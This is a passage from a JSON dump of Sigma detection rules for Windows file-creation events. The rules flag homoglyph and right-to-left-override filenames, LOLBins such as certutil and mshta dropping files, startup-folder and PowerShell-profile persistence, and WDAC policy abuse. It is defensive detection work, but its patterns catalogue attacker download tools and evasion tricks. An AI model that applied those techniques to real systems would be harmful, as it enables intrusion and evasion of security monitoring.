    "content": "title: Potential Homoglyph Attack Using Lookalike Characters in Filename\nid: 4f1707b1-b50b-45b4-b5a2-3978b5a5d0d6\nstatus: test\ndescription: |\n    Detects the presence of unicode characters which are homoglyphs, or identical in appearance, to ASCII letter characters.\n    This is used as an obfuscation and masquerading techniques. Only \"perfect\" homoglyphs are included; these are characters that\n    are indistinguishable from ASCII characters and thus may make excellent candidates for homoglyph attack characters.\nreferences:\n    - https://redcanary.com/threat-detection-report/threats/socgholish/#threat-socgholish\n    - http://www.irongeek.com/homoglyph-attack-generator.php\nauthor: Micah Babinski, @micahbabinski\ndate: 2023-05-08\ntags:\n    - attack.defense-evasion\n    - attack.t1036\n    - attack.t1036.003\n    # - attack.t1036.008\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection_upper:\n        TargetFilename|contains:\n            - \"\\u0410\" # А/A\n            - \"\\u0412\" # В/B\n            - \"\\u0415\" # Е/E\n            - \"\\u041a\" # К/K\n            - \"\\u041c\" # М/M\n            - \"\\u041d\" # Н/H\n            - \"\\u041e\" # О/O\n            - \"\\u0420\" # Р/P\n            - \"\\u0421\" # С/C\n            - \"\\u0422\" # Т/T\n            - \"\\u0425\" # Х/X\n            - \"\\u0405\" # Ѕ/S\n            - \"\\u0406\" # І/I\n            - \"\\u0408\" # Ј/J\n            - \"\\u04ae\" # Ү/Y\n            - \"\\u04c0\" # Ӏ/I\n            - \"\\u050C\" # Ԍ/G\n            - \"\\u051a\" # Ԛ/Q\n            - \"\\u051c\" # Ԝ/W\n            - \"\\u0391\" # Α/A\n            - \"\\u0392\" # Β/B\n            - \"\\u0395\" # Ε/E\n            - \"\\u0396\" # Ζ/Z\n            - \"\\u0397\" # Η/H\n            - \"\\u0399\" # Ι/I\n            - \"\\u039a\" # Κ/K\n            - \"\\u039c\" # Μ/M\n            - \"\\u039d\" # Ν/N\n            - \"\\u039f\" # Ο/O\n            - \"\\u03a1\" # Ρ/P\n            - \"\\u03a4\" # Τ/T\n            - \"\\u03a5\" # Υ/Y\n            - \"\\u03a7\" # Χ/X\n    selection_lower:\n        TargetFilename|contains:\n            - \"\\u0430\" # а/a\n            - \"\\u0435\" # е/e\n            - \"\\u043e\" # о/o\n            - \"\\u0440\" # р/p\n            - \"\\u0441\" # с/c\n            - \"\\u0445\" # х/x\n            - \"\\u0455\" # ѕ/s\n            - \"\\u0456\" # і/i\n            - \"\\u04cf\" # ӏ/l\n            - \"\\u0458\" # ј/j\n            - \"\\u04bb\" # һ/h\n            - \"\\u0501\" # ԁ/d\n            - \"\\u051b\" # ԛ/q\n            - \"\\u051d\" # ԝ/w\n            - \"\\u03bf\" # ο/o\n    condition: 1 of selection_*\nfalsepositives:\n    - File names with legitimate Cyrillic text. Will likely require tuning (or not be usable) in countries where these alphabets are in use.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_susp_legitimate_app_dropping_archive.yml",
    "content": "title: Legitimate Application Dropped Archive\nid: 654fcc6d-840d-4844-9b07-2c3300e54a26\nstatus: test\ndescription: Detects programs on a Windows system that should not write an archive to disk\nreferences:\n    - https://github.com/Neo23x0/sysmon-config/blob/3f808d9c022c507aae21a9346afba4a59dd533b9/sysmonconfig-export-block.xml#L1326\nauthor: frack113, Florian Roth\ndate: 2022-08-21\ntags:\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        Image|endswith:\n            # Microsoft Office Programs Dropping Executables\n            - \\winword.exe\n            - \\excel.exe\n            - \\powerpnt.exe\n            - \\msaccess.exe\n            - \\mspub.exe\n            - \\eqnedt32.exe\n            - \\visio.exe\n            - \\wordpad.exe\n            - \\wordview.exe\n            # LOLBINs that can be used to download executables\n            - \\certutil.exe\n            - \\certoc.exe\n            - \\CertReq.exe\n            # - \\bitsadmin.exe (depends on the environment; comment in if you're sure that bitsadmin doesn't do that in your env)\n            - \\Desktopimgdownldr.exe\n            - \\esentutl.exe\n            # - \\expand.exe\n            - \\finger.exe\n            # Executables that should never drop an executable to disk (but may after a previous process injection or if it's malware that uses a legitimate name)\n            - \\notepad.exe\n            - \\AcroRd32.exe\n            - \\RdrCEF.exe\n            - \\mshta.exe\n            - \\hh.exe\n        TargetFilename|endswith:\n            - '.zip'\n            - '.rar'\n            - '.7z'\n            - '.diagcab'\n            - '.appx'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_susp_legitimate_app_dropping_exe.yml",
    "content": "title: Legitimate Application Dropped Executable\nid: f0540f7e-2db3-4432-b9e0-3965486744bc\nstatus: test\ndescription: Detects programs on a Windows system that should not write executables to disk\nreferences:\n    - https://github.com/Neo23x0/sysmon-config/blob/3f808d9c022c507aae21a9346afba4a59dd533b9/sysmonconfig-export-block.xml#L1326\nauthor: frack113, Florian Roth (Nextron Systems)\ndate: 2022-08-21\nmodified: 2023-06-22\ntags:\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        Image|endswith:\n            # Microsoft Office Programs Dropping Executables / Rest of the apps are covered in: c7a74c80-ba5a-486e-9974-ab9e682bc5e4\n            - '\\eqnedt32.exe'\n            - '\\wordpad.exe'\n            - '\\wordview.exe'\n            # LOLBINs that can be used to download executables\n            - '\\certutil.exe'\n            - '\\certoc.exe'\n            - '\\CertReq.exe'\n            # - \\bitsadmin.exe (depends on the environment; comment in if you're sure that bitsadmin doesn't do that in your env)\n            - '\\Desktopimgdownldr.exe'\n            - '\\esentutl.exe'\n            # - \\expand.exe\n            - '\\mshta.exe'\n            # Executables that should never drop an executable to disk (but may after a previous process injection or if it's malware that uses a legitimate name)\n            - '\\AcroRd32.exe'\n            - '\\RdrCEF.exe'\n            - '\\hh.exe'\n            - '\\finger.exe'\n        TargetFilename|endswith:\n            - '.exe'\n            - '.dll'\n            - '.ocx'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_susp_legitimate_app_dropping_in_uncommon_location.yml",
    "content": "title: Legitimate Application Writing Files In Uncommon Location\nid: 1cf465a1-2609-4c15-9b66-c32dbe4bfd67\nrelated:\n    - id: 2ddef153-167b-4e89-86b6-757a9e65dcac # bitsadmin dedicated rule\n      type: similar\nstatus: experimental\ndescription: |\n    Detects legitimate applications writing any type of file to uncommon or suspicious locations that are not typical for application data storage or execution.\n    Adversaries may leverage legitimate applications (Living off the Land Binaries - LOLBins) to drop or download malicious files to uncommon locations on the system to evade detection by security solutions.\nreferences:\n    - https://lolbas-project.github.io/#/download\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-12-10\ntags:\n    - attack.defense-evasion\n    - attack.t1218\n    - attack.command-and-control\n    - attack.t1105\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection_img:\n        Image|endswith:\n            # Microsoft Office Programs Dropping Executables / Rest of the apps are covered in: c7a74c80-ba5a-486e-9974-ab9e682bc5e4\n            - '\\eqnedt32.exe'\n            - '\\wordpad.exe'\n            - '\\wordview.exe'\n            # LOLBINs that can be used to download executables\n            - '\\cmdl32.exe'\n            - '\\certutil.exe'\n            - '\\certoc.exe'\n            - '\\CertReq.exe'\n            - '\\bitsadmin.exe'\n            - '\\Desktopimgdownldr.exe'\n            - '\\esentutl.exe'\n            - '\\expand.exe'\n            - '\\extrac32.exe'\n            - '\\replace.exe'\n            - '\\mshta.exe'\n            - '\\ftp.exe'\n            - '\\Ldifde.exe'\n            - '\\RdrCEF.exe'\n            - '\\hh.exe'\n            - '\\finger.exe'\n            - '\\findstr.exe'\n    selection_locations:\n        TargetFilename|contains:\n            - ':\\Perflogs'\n            - ':\\ProgramData\\'\n            - ':\\Temp\\'\n            - ':\\Users\\Public\\'\n            - ':\\Windows\\'\n            - '\\$Recycle.Bin\\'\n            - '\\AppData\\Local\\'\n            - '\\AppData\\Roaming\\'\n            - '\\Contacts\\'\n            - '\\Desktop\\'\n            - '\\Favorites\\'\n            - '\\Favourites\\'\n            - '\\inetpub\\wwwroot\\'\n            - '\\Music\\'\n            - '\\Pictures\\'\n            - '\\Start Menu\\Programs\\Startup\\'\n            - '\\Users\\Default\\'\n            - '\\Videos\\'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\nregression_tests_path: regression_data/rules/windows/file/file_event/file_event_win_susp_legitimate_app_dropping_in_uncommon_location/info.yml\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_susp_legitimate_app_dropping_script.yml",
    "content": "title: Legitimate Application Dropped Script\nid: 7d604714-e071-49ff-8726-edeb95a70679\nstatus: test\ndescription: Detects programs on a Windows system that should not write scripts to disk\nreferences:\n    - https://github.com/Neo23x0/sysmon-config/blob/3f808d9c022c507aae21a9346afba4a59dd533b9/sysmonconfig-export-block.xml#L1326\nauthor: frack113, Florian Roth (Nextron Systems)\ndate: 2022-08-21\nmodified: 2023-06-22\ntags:\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        Image|endswith:\n            # Microsoft Office Programs Dropping Executables / Rest of the apps are covered in: c7a74c80-ba5a-486e-9974-ab9e682bc5e4\n            - \\eqnedt32.exe\n            - \\wordpad.exe\n            - \\wordview.exe\n            # LOLBINs that can be used to download executables\n            - \\certutil.exe\n            - \\certoc.exe\n            - \\CertReq.exe\n            # - \\bitsadmin.exe (depends on the environment; comment in if you're sure that bitsadmin doesn't do that in your env)\n            - \\Desktopimgdownldr.exe\n            - \\esentutl.exe\n            # - \\expand.exe\n            - '\\mshta.exe'\n            # Executables that should never drop an executable to disk (but may after a previous process injection or if it's malware that uses a legitimate name)\n            - '\\AcroRd32.exe'\n            - '\\RdrCEF.exe'\n            - '\\hh.exe'\n            - '\\finger.exe'\n        TargetFilename|endswith:\n            - '.ps1'\n            - '.bat'\n            - '.vbs'\n            - '.scf'\n            - '.wsf'\n            - '.wsh'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_susp_lnk_double_extension.yml",
    "content": "title: Suspicious LNK Double Extension File Created\nid: 3215aa19-f060-4332-86d5-5602511f3ca8\nrelated:\n    - id: b4926b47-a9d7-434c-b3a0-adc3fa0bd13e\n      type: derived\nstatus: test\ndescription: |\n    Detects the creation of files with an \"LNK\" as a second extension. This is sometimes used by malware as a method to abuse the fact that Windows hides the \"LNK\" extension by default.\nreferences:\n    - https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-june-mustang-panda/\n    - https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations\n    - https://www.cybereason.com/blog/research/a-bazar-of-tricks-following-team9s-development-cycles\n    - https://twitter.com/malwrhunterteam/status/1235135745611960321\n    - https://twitter.com/luc4m/status/1073181154126254080\nauthor: Nasreddine Bencherchali (Nextron Systems), frack113\ndate: 2022-11-07\nmodified: 2023-10-18\ntags:\n    - attack.defense-evasion\n    - attack.t1036.007\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        TargetFilename|endswith: '.lnk'\n        TargetFilename|contains:\n            - '.doc.'\n            - '.docx.'\n            - '.jpg.'\n            - '.pdf.'\n            - '.ppt.'\n            - '.pptx.'\n            - '.xls.'\n            - '.xlsx.'\n    filter_main_recent:\n        TargetFilename|contains: '\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\'\n    filter_optional_office_recent:\n        Image|endswith:\n            # Note: Some additional office application might need to be added\n            - '\\excel.exe'\n            - '\\powerpnt.exe'\n            - '\\winword.exe'\n        TargetFilename|contains: '\\AppData\\Roaming\\Microsoft\\Office\\Recent\\'\n    filter_optional_office_excel:\n        Image|endswith: '\\excel.exe'\n        TargetFilename|contains: '\\AppData\\Roaming\\Microsoft\\Excel'\n    filter_optional_office_powerpoint:\n        Image|endswith: '\\powerpnt.exe'\n        TargetFilename|contains: '\\AppData\\Roaming\\Microsoft\\PowerPoint'\n    filter_optional_office_word:\n        Image|endswith: '\\winword.exe'\n        TargetFilename|contains: '\\AppData\\Roaming\\Microsoft\\Word'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Some tuning is required for other general purpose directories of third party apps\nlevel: medium\nregression_tests_path: regression_data/rules/windows/file/file_event/file_event_win_susp_lnk_double_extension/info.yml\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_susp_powershell_profile.yml",
    "content": "title: PowerShell Profile Modification\nid: b5b78988-486d-4a80-b991-930eff3ff8bf\nstatus: test\ndescription: Detects the creation or modification of a powershell profile which could indicate suspicious activity as the profile can be used as a mean of persistence\nreferences:\n    - https://www.welivesecurity.com/2019/05/29/turla-powershell-usage/\n    - https://persistence-info.github.io/Data/powershellprofile.html\nauthor: HieuTT35, Nasreddine Bencherchali (Nextron Systems)\ndate: 2019-10-24\nmodified: 2023-10-23\ntags:\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1546.013\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        TargetFilename|endswith:\n            - '\\Microsoft.PowerShell_profile.ps1'\n            - '\\PowerShell\\profile.ps1'\n            - '\\Program Files\\PowerShell\\7-preview\\profile.ps1'\n            - '\\Program Files\\PowerShell\\7\\profile.ps1'\n            - '\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1'\n            - '\\WindowsPowerShell\\profile.ps1'\n    condition: selection\nfalsepositives:\n    - System administrator creating Powershell profile manually\nlevel: medium\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_susp_procexplorer_driver_created_in_tmp_folder.yml",
    "content": "title: Suspicious PROCEXP152.sys File Created In TMP\nid: 3da70954-0f2c-4103-adff-b7440368f50e\nstatus: test\ndescription: |\n  Detects the creation of the PROCEXP152.sys file in the application-data local temporary folder.\n  This driver is used by Sysinternals Process Explorer but also by KDU (https://github.com/hfiref0x/KDU) or Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs), which uses KDU.\nreferences:\n    - https://web.archive.org/web/20230331181619/https://blog.dylan.codes/evading-sysmon-and-windows-event-logging/\nauthor: xknow (@xknow_infosec), xorxes (@xor_xes)\ndate: 2019-04-08\nmodified: 2022-11-22\ntags:\n    - attack.t1562.001\n    - attack.defense-evasion\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        TargetFilename|contains: '\\AppData\\Local\\Temp\\'\n        TargetFilename|endswith: 'PROCEXP152.sys'\n    filter:\n        Image|contains:\n            - '\\procexp64.exe'\n            - '\\procexp.exe'\n            - '\\procmon64.exe'\n            - '\\procmon.exe'\n    condition: selection and not filter\nfalsepositives:\n    - Other legimate tools using this driver and filename (like Sysinternals). Note - Clever attackers may easily bypass this detection by just renaming the driver filename. Therefore just Medium-level and don't rely on it.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_susp_public_folder_extension.yml",
    "content": "title: Suspicious Binaries and Scripts in Public Folder\nid: b447f7de-1e53-4cbf-bfb4-f1f6d0b04e4e\nstatus: experimental\ndescription: Detects the creation of a file with a suspicious extension in the public folder, which could indicate potential malicious activity.\nreferences:\n    - https://intel.thedfirreport.com/events/view/30032 # Private Report\n    - https://intel.thedfirreport.com/eventReports/view/70 # Private Report\n    - https://thedfirreport.com/2025/01/27/cobalt-strike-and-a-pair-of-socks-lead-to-lockbit-ransomware/\nauthor: 'The DFIR Report'\ndate: 2025-01-23\ntags:\n    - attack.execution\n    - attack.t1204\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        TargetFilename|contains: ':\\Users\\Public\\'\n        TargetFilename|endswith:\n            - '.bat'\n            - '.dll'\n            - '.exe'\n            - '.hta'\n            - '.js'\n            - '.ps1'\n            - '.vbe'\n            - '.vbs'\n    condition: selection\nfalsepositives:\n    - Administrators deploying legitimate binaries to public folders.\nlevel: high\nregression_tests_path: regression_data/rules/windows/file/file_event/file_event_win_susp_public_folder_extension/info.yml\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_susp_recycle_bin_fake_exec.yml",
    "content": "title: Suspicious File Creation Activity From Fake Recycle.Bin Folder\nid: cd8b36ac-8e4a-4c2f-a402-a29b8fbd5bca\nrelated:\n    - id: 5ce0f04e-3efc-42af-839d-5b3a543b76c0\n      type: derived\nstatus: test\ndescription: Detects file write event from/to a fake recycle bin folder that is often used as a staging directory for malware\nreferences:\n    - https://www.mandiant.com/resources/blog/infected-usb-steal-secrets\n    - https://unit42.paloaltonetworks.com/cloaked-ursa-phishing/\nauthor: X__Junior (Nextron Systems)\ndate: 2023-07-12\nmodified: 2023-12-11\ntags:\n    - attack.persistence\n    - attack.defense-evasion\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        - Image|contains:\n              # e.g. C:\\$RECYCLER.BIN\n              - 'RECYCLERS.BIN\\'\n              - 'RECYCLER.BIN\\'\n        - TargetFilename|contains:\n              # e.g. C:\\$RECYCLER.BIN\n              - 'RECYCLERS.BIN\\'\n              - 'RECYCLER.BIN\\'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\nregression_tests_path: regression_data/rules/windows/file/file_event/file_event_win_susp_recycle_bin_fake_exec/info.yml\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_susp_right_to_left_override_extension_spoofing.yml",
    "content": "title: Potential File Extension Spoofing Using Right-to-Left Override\nid: 979baf41-ca44-4540-9d0c-4fcef3b5a3a4\nrelated:\n    - id: ad691d92-15f2-4181-9aa4-723c74f9ddc3\n      type: derived\nstatus: test\ndescription: |\n    Detects suspicious filenames that contain a right-to-left override character and a potentially spoofed file extensions.\nreferences:\n    - https://redcanary.com/blog/right-to-left-override/\n    - https://www.malwarebytes.com/blog/news/2014/01/the-rtlo-method\n    - https://tria.ge/241015-l98snsyeje/behavioral2\n    - https://www.unicode.org/versions/Unicode5.2.0/ch02.pdf\nauthor: Jonathan Peters (Nextron Systems), Florian Roth (Nextron Systems), Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2024-11-17\nmodified: 2025-02-06\ntags:\n    - attack.execution\n    - attack.defense-evasion\n    - attack.t1036.002\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection_rtlo_unicode:\n        TargetFilename|contains:\n            - '\\u202e'  # Unicode RTLO character\n            - '[U+202E]'\n    selection_extensions:\n        TargetFilename|contains:\n            - '3pm.'  # Reversed `.mp3`\n            - '4pm.'  # Reversed `.mp4`\n            - 'cod.'  # Reversed `.doc`\n            - 'fdp.'  # Reversed `.pdf`\n            - 'ftr.'  # Reversed `.rtf`\n            - 'gepj.'  # Reversed `.jpeg`\n            - 'gnp.'  # Reversed `.png`\n            - 'gpj.'  # Reversed `.jpg`\n            - 'ism.'  # Reversed `.msi`\n            - 'lmth.'  # Reversed `.html`\n            - 'nls.' # Reversed `.sln`\n            - 'piz.'  # Reversed `.zip`\n            - 'slx.'  # Reversed `.xls`\n            - 'tdo.'  # Reversed `.odt`\n            - 'vsc.'  # Reversed `.csv`\n            - 'vwm.'  # Reversed `.wmv`\n            - 'xcod.'  # Reversed `.docx`\n            - 'xslx.'  # Reversed `.xlsx`\n            - 'xtpp.'  # Reversed `.pptx`\n    condition: all of selection_*\nfalsepositives:\n    - Filenames that contains scriptures such as arabic or hebrew might make use of this character\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_susp_spool_drivers_color_drop.yml",
    "content": "title: Drop Binaries Into Spool Drivers Color Folder\nid: ce7066a6-508a-42d3-995b-2952c65dc2ce\nstatus: test\ndescription: Detects the creation of suspcious binary files inside the \"\\windows\\system32\\spool\\drivers\\color\\\" as seen in the blog referenced below\nreferences:\n    - https://www.microsoft.com/security/blog/2022/07/27/untangling-knotweed-european-private-sector-offensive-actor-using-0-day-exploits/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-07-28\ntags:\n    - attack.defense-evasion\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        TargetFilename|startswith: 'C:\\Windows\\System32\\spool\\drivers\\color\\'\n        TargetFilename|endswith:\n            - '.dll'\n            - '.exe'\n            - '.sys'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_susp_startup_folder_persistence.yml",
    "content": "title: Suspicious Startup Folder Persistence\nid: 28208707-fe31-437f-9a7f-4b1108b94d2e\nrelated:\n    - id: 2aa0a6b4-a865-495b-ab51-c28249537b75\n      type: similar\nstatus: test\ndescription: |\n    Detects the creation of potentially malicious script and executable files in Windows startup folders, which is a common persistence technique used by threat actors.\n    These files (.ps1, .vbs, .js, .bat, etc.) are automatically executed when a user logs in, making the Startup folder an attractive target for attackers.\n    This technique is frequently observed in malvertising campaigns and malware distribution where attackers attempt to maintain long-term access to compromised systems.\nreferences:\n    - https://github.com/last-byte/PersistenceSniper\n    - https://www.microsoft.com/en-us/security/blog/2025/03/06/malvertising-campaign-leads-to-info-stealers-hosted-on-github/\n    - https://github.com/redcanaryco/atomic-red-team/blob/5ede8f21e42ebe37e0a6eff757dba60bcfa85859/atomics/T1547.001/T1547.001.md\nauthor: Nasreddine Bencherchali (Nextron Systems), Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2022-08-10\nmodified: 2025-10-12\ntags:\n    - attack.privilege-escalation\n    - attack.execution\n    - attack.t1204.002\n    - attack.persistence\n    - attack.t1547.001\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        TargetFilename|contains: '\\Windows\\Start Menu\\Programs\\Startup\\'\n        TargetFilename|endswith:\n            # Add or remove suspicious extensions according to your env needs\n            - '.bat'\n            - '.cmd'\n            - '.dll'\n            - '.hta'\n            - '.jar'\n            - '.js'\n            - '.jse'\n            - '.msi'\n            - '.ps1'\n            - '.psd1'\n            - '.psm1'\n            - '.scr'\n            - '.url'\n            - '.vba'\n            - '.vbe'\n            - '.vbs'\n            - '.wsf'\n    condition: selection\nfalsepositives:\n    - Rare legitimate usage of some of the extensions mentioned in the rule\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_susp_system_interactive_powershell.yml",
    "content": "title: Suspicious Interactive PowerShell as SYSTEM\nid: 5b40a734-99b6-4b98-a1d0-1cea51a08ab2\nstatus: test\ndescription: Detects the creation of files that indicator an interactive use of PowerShell in the SYSTEM user context\nreferences:\n    - https://jpcertcc.github.io/ToolAnalysisResultSheet/details/PowerSploit_Invoke-Mimikatz.htm\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-12-07\nmodified: 2022-08-13\ntags:\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        TargetFilename:\n            - 'C:\\Windows\\System32\\config\\systemprofile\\AppData\\Roaming\\Microsoft\\Windows\\PowerShell\\PSReadLine\\ConsoleHost_history.txt'\n            - 'C:\\Windows\\System32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\StartupProfileData-Interactive'\n    condition: selection\nfalsepositives:\n    - Administrative activity\n    - PowerShell scripts running as SYSTEM user\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_susp_task_write.yml",
    "content": "title: Suspicious Scheduled Task Write to System32 Tasks\nid: 80e1f67a-4596-4351-98f5-a9c3efabac95\nstatus: test\ndescription: Detects the creation of tasks from processes executed from suspicious locations\nreferences:\n    - Internal Research\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-11-16\nmodified: 2022-01-12\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.execution\n    - attack.t1053\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        TargetFilename|contains: '\\Windows\\System32\\Tasks'\n        Image|contains:\n            - '\\AppData\\'\n            - 'C:\\PerfLogs'\n            - '\\Windows\\System32\\config\\systemprofile'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_susp_teamviewer_remote_session.yml",
    "content": "title: TeamViewer Remote Session\nid: 162ab1e4-6874-4564-853c-53ec3ab8be01\nstatus: test\ndescription: Detects the creation of log files during a TeamViewer remote session\nreferences:\n    - https://www.teamviewer.com/en-us/\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-01-30\ntags:\n    - attack.command-and-control\n    - attack.t1219.002\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection1:\n        TargetFilename|endswith:\n            - '\\TeamViewer\\RemotePrinting\\tvprint.db'\n            - '\\TeamViewer\\TVNetwork.log'\n    selection2:\n        TargetFilename|contains|all:\n            - '\\TeamViewer'\n            - '_Logfile.log'\n    condition: 1 of selection*\nfalsepositives:\n    - Legitimate uses of TeamViewer in an organisation\nlevel: medium\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_susp_vscode_powershell_profile.yml",
    "content": "title: VsCode Powershell Profile Modification\nid: 3a9fa2ec-30bc-4ebd-b49e-7c9cff225502\nrelated:\n    - id: b5b78988-486d-4a80-b991-930eff3ff8bf\n      type: similar\nstatus: test\ndescription: Detects the creation or modification of a vscode related powershell profile which could indicate suspicious activity as the profile can be used as a mean of persistence\nreferences:\n    - https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_profiles?view=powershell-7.2\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-24\nmodified: 2023-01-06\ntags:\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1546.013\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        TargetFilename|endswith: '\\Microsoft.VSCode_profile.ps1'\n    condition: selection\nfalsepositives:\n    - Legitimate use of the profile by developers or administrators\nlevel: medium\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_susp_wdac_policy_creation.yml",
    "content": "title: Potentially Suspicious WDAC Policy File Creation\nid: 1d2de8a6-4803-4fde-b85b-f58f3aa7a705\nstatus: experimental\ndescription: |\n    Detects suspicious Windows Defender Application Control (WDAC) policy file creation from abnormal processes that could be abused by attacker to block EDR/AV components while allowing their own malicious code to run on the system.\nreferences:\n    - https://learn.microsoft.com/en-us/windows/security/application-security/application-control/app-control-for-business/deployment/deploy-appcontrol-policies-using-group-policy\n    - https://beierle.win/2024-12-20-Weaponizing-WDAC-Killing-the-Dreams-of-EDR/\n    - https://github.com/logangoins/Krueger/tree/main\n    - https://learn.microsoft.com/en-us/windows/security/application-security/application-control/app-control-for-business/deployment/appcontrol-deployment-guide\n    - https://learn.microsoft.com/en-us/windows/security/application-security/application-control/app-control-for-business/deployment/deploy-appcontrol-policies-with-script\n    - https://learn.microsoft.com/en-us/windows/security/application-security/application-control/app-control-for-business/deployment/deploy-appcontrol-policies-with-memcm\nauthor: X__Junior\ndate: 2025-02-07\nmodified: 2025-12-03\ntags:\n    - attack.defense-evasion\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection_target:\n        # This is a default location but unfortunately it could be any path configured in Group Policy Management Editor.\n        # No file extension needed because any extension would work, check first reference.\n        TargetFilename|contains: '\\Windows\\System32\\CodeIntegrity\\'\n    filter_main_images:\n        Image|endswith:\n            - '\\Microsoft.ConfigurationManagement.exe' # Replace with full path to avoid false negatives\n            - '\\WDAC Wizard.exe' # Replace with full path to avoid false negatives\n            - 'C:\\Program Files\\PowerShell\\7-preview\\pwsh.exe'\n            - 'C:\\Program Files\\PowerShell\\7\\pwsh.exe'\n            - 'C:\\Windows\\System32\\dllhost.exe'\n            - 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell_ise.exe'\n            - 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe'\n            - 'C:\\Windows\\SysWOW64\\dllhost.exe'\n            - 'C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell_ise.exe'\n            - 'C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe'\n    filter_main_cli:\n        - CommandLine|contains|all:\n              - 'ConvertFrom-CIPolicy -XmlFilePath'\n              - '-BinaryFilePath '\n        - CommandLine|contains: 'CiTool --update-policy'\n        - CommandLine|contains|all:\n              - 'Copy-Item -Path'\n              - '-Destination'\n    filter_main_system:\n        Image: 'System'\n    filter_main_wuauclt:\n        Image:\n            - 'C:\\Windows\\System32\\wuauclt.exe'\n            - 'C:\\Windows\\UUS\\arm64\\wuaucltcore.exe'\n    condition: selection_target and not 1 of filter_main_*\nfalsepositives:\n    - Administrators and security vendors could leverage WDAC, apply additional filters as needed.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_susp_windows_terminal_profile.yml",
    "content": "title: Windows Terminal Profile Settings Modification By Uncommon Process\nid: 9b64de98-9db3-4033-bd7a-f51430105f00\nstatus: test\ndescription: Detects the creation or modification of the Windows Terminal Profile settings file \"settings.json\" by an uncommon process.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/74438b0237d141ee9c99747976447dc884cb1a39/atomics/T1547.015/T1547.015.md#atomic-test-1---persistence-by-modifying-windows-terminal-profile\n    - https://twitter.com/nas_bench/status/1550836225652686848\nauthor: frack113, Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-07-22\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1547.015\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        Image|endswith:\n            # Note: Add other potential common applications\n            - '\\cmd.exe'\n            - '\\cscript.exe'\n            - '\\mshta.exe'\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n            - '\\wscript.exe'\n        TargetFilename|endswith: 